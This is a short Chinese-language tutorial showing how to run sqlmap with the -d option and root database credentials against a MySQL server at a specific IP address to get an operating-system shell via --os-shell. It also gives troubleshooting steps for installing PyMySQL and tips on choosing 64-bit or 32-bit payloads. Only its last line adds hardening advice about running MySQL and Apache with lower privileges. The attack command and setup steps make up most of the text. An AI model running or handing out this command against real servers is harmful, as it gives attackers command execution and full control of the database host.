前提是在數據庫用戶可以外聯的情況下
python2 sqlmap.py -d "mysql://root:root@119.90.126.9:3306/dedecms" --os-shell 直接執行這一句
"數據庫類型://數據庫賬戶:密碼@ip:端口/數據庫名稱" -d是sqlmap中連接數據庫的參數
當爆出這個錯誤時說明pymysql這個庫沒有安裝
去https://github.com/PyMySQL/PyMySQL下載后,放入python安裝目錄lib中,cmd執行python2 setup.py install
如果出現這個錯誤
https://bootstrap.pypa.io/ez_setup.py 復制保存為ez_setup.py文件放入lib文件夾中,執行python2 ez_setup.py
然后再重新python2 setup.py install ,就可以了
我們再在sqlmap中試一下,成功,記得選64,選32有時不行,兩個版本都試試啦
所以我們在降權時mysql和apache都要降權,才更加安全